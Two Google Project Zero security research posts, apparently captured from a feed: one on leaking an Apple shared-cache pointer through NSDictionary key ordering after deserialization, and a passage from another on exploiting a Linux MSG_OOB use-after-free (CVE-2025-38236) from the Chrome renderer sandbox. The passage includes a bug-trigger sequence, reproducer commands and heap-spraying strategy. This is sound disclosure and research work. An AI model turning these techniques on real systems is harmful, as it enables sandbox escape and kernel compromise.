    From a slightly different perspective, the central observation of hashDoS is: If an attacker can insert a large number of chosen keys into a hash table (or hash set) and knows which hash buckets these keys hash to, then the attacker can (depending on hash table implementation details) essentially slow down future accesses to a chosen hash bucket.

    This becomes interesting if the attacker can cause the insertion of other keys whose hashes are secret into the same hash table. In practice, this can for example happen with hash tables which support mixing multiple key types together, like JavaScript's Map. Back in 2016, in the Firefox implementation, int32 numbers were hashed with a fixed hash function ScrambleHashCode(number), while strings were atomized/interned and then hashed based on their virtual address. That made it possible to first fill an attacker-chosen hash table bucket with lots of elements, then insert a string, observe whether its insertion is fast or slow, and determine from that whether the string's hash matches the attacker-chosen hash bucket.

    With some tricks relying on a pattern in the addresses of interned single-character strings in Firefox, that made it possible to leak the lower 32 bits of a heap address through Map insertions and timing measurements. For more details, see the original writeup and bug report. Of course, nowadays that kind of timing-based in-process partial pointer leak from JavaScript would be considered less interesting, since it is generally assumed that JavaScript can read all memory in the same process anyway...

    A takeaway from this is: When pointers are used as the basis for object hash codes, this can leak pointers through side channels in keyed data structures.

    Linux: object ordering leak through in-order listing of a pointer-keyed tree

    As I noted in a blog post a few years ago, on Linux, it is possible for unprivileged userspace to discover in what order struct file instances are stored in kernel virtual memory by reading from /proc/self/fdinfo/<epoll fd> - this file lists all files that are watched by an epoll instance by iterating through a red-black tree that is (essentially) sorted by the virtual address of the referenced struct file, so the data given to userspace is sorted in the same way.

    (As I noted in that post, this could be particularly interesting for breaking probabilistic memory safety mitigations that rely on pointer tagging. If the highest bits of pointers are secret tag bits, and an attacker can determine the order of the addresses (including tag bits) of objects, the attacker can infer whether an object's tag changed after reallocation.)

    A takeaway from this is: Keyed data structures don't just leak information about object hash codes through timing; iterating over a keyed data structure can also generate data whose ordering reveals information about object hash codes.

    Serialization attacks

    There are various approaches to serializing an object graph. On one side of the spectrum is schema-based serialization, where ideally:

    • serializable types with their members are declared separately from other types

    • fields explicitly declare which other types they can point to (there are no generic pointers that can point to anything)

    • deserialization starts from a specific starting type

    On the other side of the serialization spectrum are things like classic Java serialization (without serialization filters), where essentially any class marked as Serializable can be deserialized, serialized fields can often flexibly point to lots of different types, and therefore serialized data can also have a lot of control over the shape of the resulting object graph. There is a lot of public research on the topic of "serialization gadget chains" in Java, where objects can be combined such that deserializing them results in things like remote code execution. This type of serialization is generally considered to be unsafe for use across security boundaries, though Android exposes it across local security boundaries.

    Somewhere in the middle of this spectrum is serialization that is fundamentally built like unsafe deserialization, but adds some coarse filters that only allow deserialized objects to have types from an allowlist to make it safe. In Java, that is called "serialization filtering". This is also approximately the behavior of Apple's NSKeyedUnarchiver.unarchivedObjectOfClasses, which this post focuses on.


    An artificial test case

    The goal of the technique described in this post is to leak a pointer to the "shared cache" (a large mapping which is at the same virtual address across all processes on the system, whose address only changes on reboot) through a single execution of the following test case, which uses NSKeyedUnarchiver.unarchivedObjectOfClasses to deserialize an attacker-supplied object graph consisting of the types NSDictionary, NSNumber, NSArray and NSNull, re-serializes the result, and writes back the resulting serialized data:

    @import Foundation;

    int main() {

      @autoreleasepool {

        NSArray *args = [[NSProcessInfo processInfo] arguments];

        if (args.count != 3) {

          NSLog(@"bad invocation");

          return 1;

        }

        NSString *in_path = args[1];

        NSString *out_path = args[2];


        NSError *error = NULL;


        NSData *input_binary = [NSData dataWithContentsOfFile:in_path];


        /* decode */

        NSArray<Class> *allowed_classes = @[ [NSDictionary class], [NSNumber class], [NSArray class], [NSString class], [NSNull class] ];

        NSObject *decoded_data = [NSKeyedUnarchiver unarchivedObjectOfClasses:[NSSet setWithArray:allowed_classes] fromData:input_binary error:&error];

        if (error) {

          NSLog(@"Error %@ decoding", error);

          return 1;

        }

        NSLog(@"decoded");


        NSData *encoded_binary = [NSKeyedArchiver archivedDataWithRootObject:decoded_data requiringSecureCoding:true error:&error];

        if (error) {

          NSLog(@"Error %@ encoding", error);

          return 1;

        }

        NSLog(@"reencoded");


        [encoded_binary writeToFile:out_path atomically:NO];

      }

      return 0;

    }


    (The test case also allows
    NSString but I think that was irrelevant.)

    Building blocks

    The NSNull / CFNull singleton

    The CFNull type is special: There is only one singleton instance of it, kCFNull, implemented in CFBase.c, which is stored in the shared cache. When you deserialize an NSNull object, this doesn't actually create a new object - instead, the singleton is used.

    In the CFRuntimeClass for CFNull, __CFNullClass, no hash handler is provided. When CFHash is called on an object with a type like __CFNullClass that does not implement a ->hash handler, the address of the object is used as the hash code.

    Pointer-based hashing is not specific to NSNull; but there probably aren't many other types for which deserialization uses singletons in the shared cache. There are probably way more types for which instances' hashes are heap addresses.

    NSNumber

    The NSNumber type encapsulates a number and supports several types of numbers; its hash handler __CFNumberHash hashes 32-bit integers with _CFHashInt, which pretty much just performs a multiplication with some big prime number.

    NSDictionary

    Instances of the NSDictionary type are immutable hash tables and can contain arbitrarily-typed keys. Key hashes are mapped to hash table buckets using a simple modulo operation: hash_code % num_buckets. The number of hash buckets in a NSDictionary is always a prime number (see __CFBasicHashTableSizes); hash table sizes are chosen based on __CFBasicHashTableCapacities such that hash tables are normally roughly half-full (around 38%-62%), though the sizing is a bit different for small sizes. These are probing-style hash tables; so rather than having a linked list off each hash bucket, collisions are handled by finding alternate buckets to store colliding elements in using the policy __kCFBasicHashLinearHashingValue / FIND_BUCKET_HASH_STYLE == 1, under which insertion scans forward through the hash table buckets.

    I haven't found source code for serialization of NSDictionary, but it appears to happen in the obvious way, by iterating through the hash buckets in order.

    The attack

    The basic idea: Infoleak through key ordering in serialized NSDictionary

    If a targeted process fills an NSDictionary with attacker-chosen NSNumber keys (through deserialization), the attacker can control which hash buckets will be used by using numbers for which the number's hash modulo the hash table size results in the desired bucket index. If the targeted process then inserts an NSNull key (still as part of the same deserialization), and then serializes the resulting NSDictionary, the location of the NSNull key in the dictionary's serialized keys will reveal information about the hash of NSNull.

    In particular, the attacker can create a pattern like this using NSNumber keys (where # is a bucket occupied by an NSNumber, and _ is a bucket left empty), where even-numbered buckets are occupied and odd-numbered buckets are empty, here with the example of a hash table of size 7:

    bucket index:    0123456

    bucket contents: #_#_#_#


    This leaves three spots where the NSNull could be inserted (marked with !):

    • At index 1 (#!#_#_#). This happens if hash_code % num_buckets is 6, 0, or 1. (For 6 and 0, insertion would scan linearly through the buckets until finding the free bucket at index 1.) This would result in NSNull being second in the serialized data.

    • At index 3 (#_#!#_#). This happens if hash_code % num_buckets is 2 or 3. This would result in NSNull being third in the serialized data.

    • At index 5 (#_#_#!#). This happens if hash_code % num_buckets is 4 or 5. This would result in NSNull being fourth in the serialized data.

    If the serialized data is then sent back to the attacker, the attacker can distinguish between these three states (based on the index of the NSNull key in the serialized data), and learn in which range hash_code % num_buckets is.

    Extending it: Leaking the entire bucket index

    If the attack from the last section is repeated with the following pattern (occupying odd-numbered buckets and leaving even-numbered ones empty), this yields more information about hash_code % num_buckets:

    0123456

    _#_#_#_


    (Caveat: Don't think too hard about how a hash table with 3 elements would use only 3 buckets and therefore wouldn't look like this. The actual reproducer uses hash tables with >=23 buckets.)

    Now we have four spots where the NSNull could be inserted:

    • At index 0, if hash_code % num_buckets is 0.

    • At index 2, if hash_code % num_buckets is 1 or 2.

    • At index 4, if hash_code % num_buckets is 3 or 4.

    • At index 6, if hash_code % num_buckets is 5 or 6.

    By combining the information from an NSDictionary that uses the even-buckets-occupied pattern and an NSDictionary that uses the odd-buckets-occupied pattern, the exact value of hash_code % num_buckets can be determined; for example, if the first pattern results in #_#!#_# and the second pattern results in _#!#_#_, then hash_code % num_buckets is 2.

    So by sending a serialized NSArray containing two NSDictionary instances with these patterns of NSNumber and NSNull keys to some targeted process, and then receiving a re-serialized copy from the victim, an attacker can determine hash_code % num_buckets for NSArray.

    Some math: Leaking the entire hash_code

    To leak even more information about the hash_code, this can be repeated with different hash table sizes. The attack from the last section leaks hash_code % num_buckets, where num_buckets is a prime number that the attacker can pick from the possible sizes __CFBasicHashTableSizes based on how many elements are in each NSDictionary.

    A useful math trick here is: Based on the values resulting from calculating hash_code modulo a bunch of different prime numbers, hash_code modulo the product of all those prime numbers can be calculated using the extended Euclidean algorithm. Therefore, based on knowing hash_code % num_buckets for the hash table sizes 23, 41, 71, 127, 191, 251, 383, 631 and 1087, it is possible to determine hash_code modulo 23*41*71*127*191*251*383*631*1087 = 0x5'ce23'017b'3bd5'1495. Because 0x5'ce23'017b'3bd5'1495 is bigger than the biggest value hash_code can have (since hash_code is 64-bit), that will be the actual value of hash_code - the address of the NSNull singleton.

    Putting it together

    So to leak the address of the NSNull singleton in the shared cache, an attacker has to send serialized data consisting of one large container (such as an NSArray) that, for each prime number of interest, contains two NSDictionary instances with the even-indices and odd-indices patterns. (The NSNull keys should come last in the attacker-provided serialized NSDictionary instances, so my reproducer constructs the serialized data manually as an XML plist, and I then convert it to a binary plist with plutil.)

    This attacker-provided serialized data is about 50 KiB in size.

    The targeted process then has to deserialize this data, serialize it again, and send it back to the attacker.

    Afterwards, the attacker can determine in which buckets NSNull was stored in each NSDictionary, use the bucket indices from pairs of NSDictionary to determine hash_code % num_buckets for each hash table size, and then use the extended Euclidean algorithm to obtain hash_code, the address of the NSNull singleton.

    The reproducer

    I wrote a reproducer for this issue, consisting of my own victim program that runs on the target machine and attacker programs that provide serialized data to the target machine and receive re-serialized data from the target. (For easy reproduction, you can test this on a single machine, that's also what I did; though I rebooted between "attacker" and "target" to make sure the attacker isn't using the same shared cache address as the target.)

    First, on the attacker machine, generate serialized data:

    % clang -o attacker-input-generator attacker-input-generator.c

    % ./attacker-input-generator > attacker-input.plist

    % plutil -convert binary1 attacker-input.plist


    Then, on the target machine, deserialize and re-serialize this data:

    % clang round-trip-victim.m -fobjc-arc -fmodules -o round-trip-victim

    % ./round-trip-victim attacker-input.plist reencoded.plist

    2024-11-25 22:29:44.043 round-trip-victim[1257:11287] decoded

    2024-11-25 22:29:44.049 round-trip-victim[1257:11287] reencoded


    For validation, you can also use this helper on the target machine to see the real address of the CFNull singleton:

    % clang debug-nsnull-hash.m -fobjc-arc -fmodules -o debug-nsnull-hash

    % ./debug-nsnull-hash

    null singleton pointer = 0x1eb91ab60, null_hash = 0x00000001eb91ab60


    Then, on the attacker machine, process the re-serialized data:

    % plutil -convert xml1 reencoded.plist

    % clang -o extract-pointer extract-pointer.c

    % ./extract-pointer < reencoded.plist

    serialized data with 1111 objects

    NSNull class is 12, NSNull object is 11

    NSNull is elem 8 out of 13

    NSNull is elem 7 out of 12

    NSNull is elem 7 out of 22

    NSNull is elem 7 out of 21

    NSNull is elem 6 out of 37

    NSNull is elem 5 out of 36

    NSNull is elem 61 out of 65

    NSNull is elem 60 out of 64

    NSNull is elem 32 out of 97

    NSNull is elem 31 out of 96

    NSNull is elem 95 out of 127

    NSNull is elem 95 out of 126

    NSNull is elem 175 out of 193

    NSNull is elem 175 out of 192

    NSNull is elem 188 out of 317

    NSNull is elem 188 out of 316

    NSNull is elem 214 out of 545

    NSNull is elem 214 out of 544


    NSNull mod 23 = 14

    NSNull mod 41 = 13

    NSNull mod 71 = 10

    NSNull mod 127 = 120

    NSNull mod 191 = 62

    NSNull mod 251 = 189

    NSNull mod 383 = 349

    NSNull mod 631 = 375

    NSNull mod 1087 = 427


    NSNull mod 0x000000000000000000000000000003af =

    0x0000000000000000000000000000017e

    NSNull mod 0x00000000000000000000000000010589 =

    0x000000000000000000000000000059e6

    NSNull mod 0x0000000000000000000000000081bef7 =

    0xfffffffffffffffffffffffffff4177a

    NSNull mod 0x00000000000000000000000060cd7a49 =

    0x000000000000000000000000078e47f3

    NSNull mod 0x00000000000000000000005ee976e593 =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x000000000000000000008dff48e176ed =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x0000000000000000015e003ca3bc222b =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x0000000000000005ce23017b3bd51495 =

    0x000000000000000000000001eb91ab60


    NSNull = 0x1eb91ab60


    Conclusion

    This is a fairly theoretical attack; but I think it demonstrates that using pointers as object hashes for keyed data structures can lead to pointer leaks if everything lines up right, even without using timing attacks.

    My example relies on the victim re-serializing the data; but a timing attack version of this might be possible too, with significantly more requests and sufficiently precise measurements.

    In my testcase, NSDictionary made it possible to essentially leak information about the ordering of pointers and hashes of numbers by mixing keys of different types; but it is probably possible to leak some amount of information even from data structures that only use pointer keys without mixing key types, especially when the attacker can guess how far apart heap objects are allocated or such and/or can reference the same objects repeatedly across multiple containers.

    The most robust mitigation against this is to avoid using object addresses as lookup keys, or alternatively hash them with a keyed hash function (which should reduce the potential address leak to a pointer equality oracle). However, that could come with negative performance effects - in particular, using an ID stored inside an object instead of the object's address could add a memory load to the critical path of lookups.


    • ✇Project Zero
    • From Chrome renderer code exec to kernel with MSG_OOB Google Project Zero
      Posted by Jann Horn, Google Project ZeroIntroduction In early June, I was reviewing a new Linux kernel feature when I learned about the MSG_OOB feature supported by stream-oriented UNIX domain sockets. I reviewed the implementation of MSG_OOB, and discovered a security bug (CVE-2025-38236) affecting Linux >=6.9. I reported the bug to Linux, and it got fixed. Interestingly, while the MSG_OOB feature is not used by Chrome, it was exposed in the Chrome renderer sandbox. (Since then, sending M
       

    From Chrome renderer code exec to kernel with MSG_OOB

    8 de Agosto de 2025, 07:43

    Posted by Jann Horn, Google Project Zero

    Introduction

    In early June, I was reviewing a new Linux kernel feature when I learned about the MSG_OOB feature supported by stream-oriented UNIX domain sockets. I reviewed the implementation of MSG_OOB, and discovered a security bug (CVE-2025-38236) affecting Linux >=6.9. I reported the bug to Linux, and it got fixed. Interestingly, while the MSG_OOB feature is not used by Chrome, it was exposed in the Chrome renderer sandbox. (Since then, sending MSG_OOB messages has been blocked in Chrome renderers in response to this issue.)

    The bug is pretty easy to trigger; the following sequence results in UAF:

    char dummy;

    int socks[2];

    socketpair(AF_UNIX, SOCK_STREAM, 0, socks);

    send(socks[1], "A", 1, MSG_OOB);

    recv(socks[0], &dummy, 1, MSG_OOB);

    send(socks[1], "A", 1, MSG_OOB);

    recv(socks[0], &dummy, 1, MSG_OOB);

    send(socks[1], "A", 1, MSG_OOB);

    recv(socks[0], &dummy, 1, 0);

    recv(socks[0], &dummy, 1, MSG_OOB);


    I was curious to explore how hard it is to actually exploit such a bug from inside the Chrome Linux Desktop renderer sandbox on an x86-64 Debian Trixie system, escalating privileges directly from native code execution in the renderer to the kernel. Even if the bug is reachable, how hard is it to find useful primitives for heap object reallocation, delay injection, and so on?

    The exploit code is posted on our bugtracker; you may want to reference it while following along with this post.

    Backstory: The feature

    Support for using MSG_OOB with AF_UNIX stream sockets was added in 2021 with commit 314001f0bf92 ("af_unix: Add OOB support", landed in Linux 5.15). With this feature, it is possible to send a single byte of "out-of-band" data that the recipient can read ahead of the rest of the data. The feature is very limited - out-of-band data is always a single byte, and there can only be a single pending byte of out-of-band data at a time. (Sending two out-of-band messages one after another causes the first one to be turned into a normal in-band message.) This feature is used almost nowhere except in Oracle products, as discussed on an email thread from 2024 where removal of the feature was proposed; yet it is enabled by default when AF_UNIX socket support is enabled in the kernel config, and it wasn't even possible to disable MSG_OOB support until commit 5155cbcdbf03 ("af_unix: Add a prompt to CONFIG_AF_UNIX_OOB") landed in December 2024.

    Because the Chrome renderer sandbox allows stream-oriented UNIX domain sockets and didn't filter the flags arguments of send()/recv() functions, this esoteric feature was usable inside the sandbox.

    When a message (represented by a socket buffer / struct sk_buff, short SKB) is sent between two connected stream-oriented sockets, the message is added to the ->sk_receive_queue of the receiving socket, which is a linked list. An SKB has a length field ->len describing the length of data contained within it (counting both data in the SKB's "head buffer" as well as data indirectly referenced by the SKB in other ways). An SKB also contains some scratch space that can be used by the subsystem currently owning the SKB (char cb[48] in struct sk_buff); UNIX domain sockets access this scratch space with the helper #define UNIXCB(skb) (*(struct unix_skb_parms *)&((skb)->cb)), and one of the things they store in there is a field u32 consumed which stores the number of bytes of the SKB that have already been read from the socket. UNIX domain sockets count the remaining length of an SKB with the helper unix_skb_len(), which returns skb->len - UNIXCB(skb).consumed.

    MSG_OOB messages (sent with something like send(sockfd, &message_byte, 1, MSG_OOB), which goes through queue_oob() in the kernel) are also added to the ->sk_receive_queue just like normal messages; but to allow the receiving socket to access the latest out-of-band message ahead of the rest of the queue, the ->oob_skb pointer of the receiving socket is updated to point to this message. When the receiving socket receives an OOB message with something like recv(sockfd, &received_byte, 1, MSG_OOB) (implemented in unix_stream_recv_urg()), the corresponding socket buffer stays on the ->sk_receive_queue, but its consumed field is incremented, causing its remaining length (unix_skb_len()) to become 0, and the ->oob_skb pointer is cleared; the normal receive path will have to deal with this when encountering the remaining-length-0 SKB.

    This means that the normal recv() path (unix_stream_read_generic()), which runs when recv() is called without MSG_OOB, must be able to deal with remaining-length-0 SKBs and must take care to clear the ->oob_skb pointer when it deletes an OOB SKB. manage_oob() is supposed to take care of this. Essentially, when the normal receive path obtains an SKB from the ->sk_receive_queue, it calls manage_oob() to take care of all the fixing-up required to deal with the OOB mechanism; manage_oob() will then return the first SKB that contains at least 1 byte of remaining data, and manage_oob() ensures that this SKB is no longer referenced as ->oob_skb. unix_stream_read_generic() can then proceed as if the OOB mechanism didn't exist.

    Backstory: The bug, and what led to it

    In mid-2024, a userspace API inconsistency was discovered, where recv() could spuriously return 0 (which normally signals end-of-file) when trying to read from a socket with a receive queue that contains a remaining-length-0 SKB left behind by receiving an OOB SKB. The fix for this issue introduced two closely related security issues that can lead to UAF; it was marked as fixing a bug introduced by the original MSG_OOB implementation, but luckily was actually only backported to Linux 6.9.8, so the buggy fix did not land in older LTS kernel branches.

    After the buggy fix, manage_oob() looked as follows:

    static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,

                                      int flags, int copied)

    {

            struct unix_sock *u = unix_sk(sk);

            if (!unix_skb_len(skb)) {

                    struct sk_buff *unlinked_skb = NULL;

                    spin_lock(&sk->sk_receive_queue.lock);

                    if (copied) {

                            skb = NULL;

                    } else if (flags & MSG_PEEK) {

                            skb = skb_peek_next(skb, &sk->sk_receive_queue);

                    } else {

                            unlinked_skb = skb;

                            skb = skb_peek_next(skb, &sk->sk_receive_queue);

                            __skb_unlink(unlinked_skb, &sk->sk_receive_queue);

                    }

                    spin_unlock(&sk->sk_receive_queue.lock);

                    consume_skb(unlinked_skb);

            } else {

                    struct sk_buff *unlinked_skb = NULL;

                    spin_lock(&sk->sk_receive_queue.lock);

                    if (skb == u->oob_skb) {

                            if (copied) {

                                    skb = NULL;

                            } else if (!(flags & MSG_PEEK)) {

                                    if (sock_flag(sk, SOCK_URGINLINE)) {

                                            WRITE_ONCE(u->oob_skb, NULL);

                                            consume_skb(skb);

                                    } else {

                                            __skb_unlink(skb, &sk->sk_receive_queue);

                                            WRITE_ONCE(u->oob_skb, NULL);

                                            unlinked_skb = skb;

                                            skb = skb_peek(&sk->sk_receive_queue);

                                    }

                            } else if (!sock_flag(sk, SOCK_URGINLINE)) {

                                    skb = skb_peek_next(skb, &sk->sk_receive_queue);

                            }

                    }

                    spin_unlock(&sk->sk_receive_queue.lock);

                    if (unlinked_skb) {

                            WARN_ON_ONCE(skb_unref(unlinked_skb));

                            kfree_skb(unlinked_skb);

                    }

            }

            return skb;

    }


    After this change, syzbot (the public syzkaller instance operated by Google) reported that a use-after-free occurs in the following scenario, as described by the fix commit for the syzbot-reported issue:

      1. send(MSG_OOB)

      2. recv(MSG_OOB)

         -> The consumed OOB remains in recv queue

      3. send(MSG_OOB)

      4. recv()

         -> manage_oob() returns the next skb of the consumed OOB

         -> This is also OOB, but unix_sk(sk)->oob_skb is not cleared

      5. recv(MSG_OOB)

         -> unix_sk(sk)->oob_skb is used but already freed


    In other words, the issue is that when the receive queue looks like this (shown with the oldest message at the top):

    • SKB 1: unix_skb_len()=0
    • SKB 2: unix_skb_len()=1 <--OOB pointer

    and a normal recv() happens, then manage_oob() takes the !unix_skb_len(skb) branch, which deletes the SKB with remaining length 0 and skips forward to the following SKB; but it then doesn't go through the skb == u->oob_skb check as it otherwise would, which means it doesn't clear out the ->oob_skb pointer before the SKB is consumed by the normal receive path, creating a dangling pointer that will lead to UAF on a subsequent recv(... MSG_OOB).

    This issue was fixed, making the checks for remaining-length-0 SKBs and ->oob_skb in manage_oob() independent:

    static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,

                                      int flags, int copied)

    {

            struct sk_buff *read_skb = NULL, *unread_skb = NULL;

            struct unix_sock *u = unix_sk(sk);

            if (likely(unix_skb_len(skb) && skb != READ_ONCE(u->oob_skb)))

                    return skb;

            spin_lock(&sk->sk_receive_queue.lock);

            if (!unix_skb_len(skb)) {

                    if (copied && (!u->oob_skb || skb == u->oob_skb)) {

                            skb = NULL;

                    } else if (flags & MSG_PEEK) {

                            skb = skb_peek_next(skb, &sk->sk_receive_queue);

                    } else {

                            read_skb = skb;

                            skb = skb_peek_next(skb, &sk->sk_receive_queue);

                            __skb_unlink(read_skb, &sk->sk_receive_queue);

                    }

                    if (!skb)

                            goto unlock;

            }

            if (skb != u->oob_skb)

                    goto unlock;

            if (copied) {

                    skb = NULL;

            } else if (!(flags & MSG_PEEK)) {

                    WRITE_ONCE(u->oob_skb, NULL);

                    if (!sock_flag(sk, SOCK_URGINLINE)) {

                            __skb_unlink(skb, &sk->sk_receive_queue);

                            unread_skb = skb;

                            skb = skb_peek(&sk->sk_receive_queue);

                    }

            } else if (!sock_flag(sk, SOCK_URGINLINE)) {

                    skb = skb_peek_next(skb, &sk->sk_receive_queue);

            }

    unlock:

            spin_unlock(&sk->sk_receive_queue.lock);

            consume_skb(read_skb);

            kfree_skb(unread_skb);

            return skb;

    }


    But a remaining issue is that when this function discovers a remaining-length-0 SKB left behind by recv(..., MSG_OOB), it skips ahead to the next SKB and assumes that it is not also a remaining-length-0 SKB. If this assumption is broken, manage_oob() can return a pointer to the second remaining-length-0 SKB, which is bad because the caller unix_stream_read_generic() does not expect to see remaining-length-0 SKBs:

    static int unix_stream_read_generic(struct unix_stream_read_state *state,

                                        bool freezable)

    {

    [...]

            int flags = state->flags;

    [...]

            int skip;

    [...]

            skip = max(sk_peek_offset(sk, flags), 0); // 0 if MSG_PEEK isn't set

            do {

                    struct sk_buff *skb, *last;

    [...]

                    last = skb = skb_peek(&sk->sk_receive_queue);

                    last_len = last ? last->len : 0;

    again:

    #if IS_ENABLED(CONFIG_AF_UNIX_OOB)

                    if (skb) {

                            skb = manage_oob(skb, sk, flags, copied);

                            if (!skb && copied) {

                                    unix_state_unlock(sk);

                                    break;

                            }

                    }

    #endif

                    if (skb == NULL) {

    [...]

                    }

                    while (skip >= unix_skb_len(skb)) {

                            skip -= unix_skb_len(skb);

                            last = skb;

                            last_len = skb->len;

                            skb = skb_peek_next(skb, &sk->sk_receive_queue);

                            if (!skb)

                                    goto again;

                    }

    [...]

                    /* Mark read part of skb as used */

                    if (!(flags & MSG_PEEK)) {

                            UNIXCB(skb).consumed += chunk;

    [...]

                            if (unix_skb_len(skb))

                                    break;

                            skb_unlink(skb, &sk->sk_receive_queue);

                            consume_skb(skb); // frees the SKB

                            if (scm.fp)

                                    break;

                    } else {


    If MSG_PEEK is not set (which is the only case in which SKBs can actually be freed), skip is always 0, and the while (skip >= unix_skb_len(skb)) loop condition should always be false; but when a remaining-length-0 SKB unexpectedly gets here, the condition turns into 0 >= 0, and the loop skips ahead to the first SKB that does not have remaining length 0. That SKB could be the ->oob_skb; in which case this again bypasses the logic in manage_oob() that is supposed to set ->oob_skb to NULL before the current ->oob_skb can be freed.

    So the remaining bug can be triggered by first doing the following twice, creating two remaining-length-0 SKBs in the ->sk_receive_queue:

    send(socks[1], "A", 1, MSG_OOB);

    recv(socks[0], &dummy, 1, MSG_OOB);


    If another OOB SKB is then sent with send(socks[1], "A", 1, MSG_OOB), the ->sk_receive_queue will look like this:

    • SKB 1: unix_skb_len()=0
    • SKB 2: unix_skb_len()=0
    • SKB 3: unix_skb_len()=1 <--OOB pointer

    Now, recv(socks[0], &dummy, 1, 0) will trigger the bug and free SKB 3 while leaving ->oob_skb pointing to it; making it possible for subsequent recv() syscalls with MSG_OOB to use the dangling pointer.

    The initial primitive

    This bug yields a dangling ->msg_oob pointer. Pretty much the only way to use that dangling pointer is the recv() syscall with MSG_OOB, either with or without MSG_PEEK, which is implemented in unix_stream_recv_urg(). (There are other codepaths that touch it, but they're mostly just pointer comparisons, with the exception of the unix_ioctl() handler for SIOCATMARK, which is blocked in Chrome's seccomp sandbox.)

    unix_stream_recv_urg() does this:

    static int unix_stream_recv_urg(struct unix_stream_read_state *state)

    {

            struct socket *sock = state->socket;

            struct sock *sk = sock->sk;

            struct unix_sock *u = unix_sk(sk);

            int chunk = 1;

            struct sk_buff *oob_skb;

            mutex_lock(&u->iolock);

            unix_state_lock(sk);

            spin_lock(&sk->sk_receive_queue.lock);

            if (sock_flag(sk, SOCK_URGINLINE) || !u->oob_skb) {

    [...]

            }

            // read dangling pointer

            oob_skb = u->oob_skb;

            if (!(state->flags & MSG_PEEK))

                    WRITE_ONCE(u->oob_skb, NULL);

            spin_unlock(&sk->sk_receive_queue.lock);

            unix_state_unlock(sk);

            // read primitive

            // ->recv_actor() is unix_stream_read_actor()

            chunk = state->recv_actor(oob_skb, 0, chunk, state);

            if (!(state->flags & MSG_PEEK))

                    UNIXCB(oob_skb).consumed += 1; // write primitive

            mutex_unlock(&u->iolock);

            if (chunk < 0)

                    return -EFAULT;

            state->msg->msg_flags |= MSG_OOB;

            return 1;

    }


    At a high level, the call to state->recv_actor() (which goes down the call path unix_stream_read_actor -> skb_copy_datagram_msg -> skb_copy_datagram_iter -> __skb_datagram_iter(cb=simple_copy_to_iter)) gives a read primitive: it is trying to copy one byte of data referenced by the oob_skb to userspace, so by replacing the memory pointed to by oob_skb with controlled, repeatedly writable data, it is possible to repeatedly cause copy_to_user(<userspace pointer>, <kernel pointer>, 1) with arbitrary kernel pointers. As long as MSG_PEEK is set, this can be repeated; only when MSG_PEEK is clear, the ->msg_oob pointer is cleared.

    The only write primitive this bug yields is the increment UNIXCB(oob_skb).consumed += 1 that happens when MSG_PEEK is not set. In the build I'm looking at, the consumed field that is incremented is located 0x44 bytes into the oob_skb, an object which is effectively allocated with an alignment of 0x100 bytes. This means that, if the write primitive is applied to a 64-bit length value or a pointer, it would have to do an increment at offset 4 relative to the 8-byte aligned overwrite target, and it would effectively increment the 64-bit pointer/length by 4 GiB.

    My exploit for this issue

    Discarded strategy for using the write primitive: Pointer increment

    It would be possible to free the sk_buff and reallocate it as some structure containing a pointer at offset 0x40. The write primitive would effectively increment this pointer by 4 GiB (because it would increment by 1 at an offset 4 bytes into the pointer). But this would fundamentally rely on the machine having significantly more than 4 GiB of RAM, which feels gross and a bit like cheating.

    Overall strategy

    Since this issue relatively straightforwardly leads to a semi-arbitrary read (subject to usercopy hardening restrictions), but the write primitive is much more gnarly, I decided to go with the general approach of: first get the read primitive working; then use the read primitive to assist in exploiting the write primitive. This way, ideally everything after the read primitive bootstrapping can be made reliable with enough work.

    Dealing with per-cpu state

    Lots of things in this exploit rely on per-cpu kernel data structures and will fail if a task is migrated between CPUs at the wrong time. In some places in the exploit, I repeatedly check which CPU the exploit is running on with sched_getcpu(), and retry if the CPU number changed; though I was too lazy to do that everywhere perfectly, and this could be done even better by relying more directly on the "restartable sequences" subsystem.

    Note that the Chrome sandbox policy forbids __NR_getcpu; but that has no effect at all on sched_getcpu(), in particular on x86-64, because there are two faster alternatives to the getcpu() syscall that glibc prefers to use instead:

    • The kernel's rseq subsystem maintains a struct rseq in userspace for each thread, which contains the cpu_id that the thread is currently running on; if rseq is available, glibc will read from the rseq struct.
    • On x86-64, the vDSO contains a pure-userspace implementation of the getcpu() syscall which relies on either the RDPID instruction or, if that is not available, the LSL instruction to determine the ID of the current CPU without having to perform a syscall. (This is implemented in vdso_read_cpunode() in the kernel sources, which is compiled into the vDSO that is mapped into userspace.)

    Setting up the read primitive - mostly boring spraying

    On the targeted Debian kernel, struct sk_buff is in the skbuff_head_cache SLUB cache, which normally uses order-1 unmovable pages. I had trouble finding a good reallocation primitive that also uses order-1 pages (though maple_node might have been an option); so I went for reallocation as a pipe page (order-0 unmovable), though that means that the reallocation will go through the buddy allocator and requires the order-0 unmovable list to become empty so that an order-1 page is split up.

    This is not very novel, so I will only describe a few interesting aspects of the strategy here - if you want a better understanding of how to free a SLUB page and reallocate it as something else, there are plenty of existing writeups, including one I wrote a while ago (section "Attack stage: Freeing the object's page to the page allocator"), though that one does not discuss the buddy allocator.

    To make it more likely for a reallocation of an order-1 page as an order-0 page to succeed, the exploit starts by allocating a large number of order-0 unmovable pages to drain the order-0 and order-1 unmovable freelists. Most ways of allocating large amounts of kernel memory are limited in the sandbox; in particular, the default file descriptor table size soft limit (RLIMIT_NOFILE) is 4096 on Debian (Chrome leaves this limit as-is), and I can neither use setrlimit() to bump that number up (due to seccomp) nor create subprocesses with separate file descriptor tables. (A real exploit might be able to work around this by exploiting several renderer processes, though that seems like a pain.) The one primitive I have for allocating large amounts of unmovable pages are page tables: by creating a gigantic anonymous VMA (read-only to avoid running into Chrome's RLIMIT_DATA restrictions) and then triggering read faults all over this VMA, an unlimited number of page tables can be allocated. I use this to spam around 10% of total RAM with page tables. (To figure out how much RAM the machine has, I'm testing whether mmap() works with different sizes, relying on the OVERCOMMIT_GUESS behavior of __vm_enough_memory(); though that doesn't actually work precisely in the sandbox due to the RLIMIT_DATA limit. A cleaner and less noisy way might be to actually fill up RAM and use mincore() to figure out how large the working set can get before pages get swapped out or discarded.)

    Afterwards, I create 41 UNIX domain sockets and use them to spam 256 SKB allocations each; since each SKB uses 0x100 bytes, this allocates a bit over 2.5 MiB of kernel memory. That is enough to later flush a slab page out of both SLUB's per-cpu partial list as well as the page allocator's per-cpu freelist, all the way into the buddy allocator.

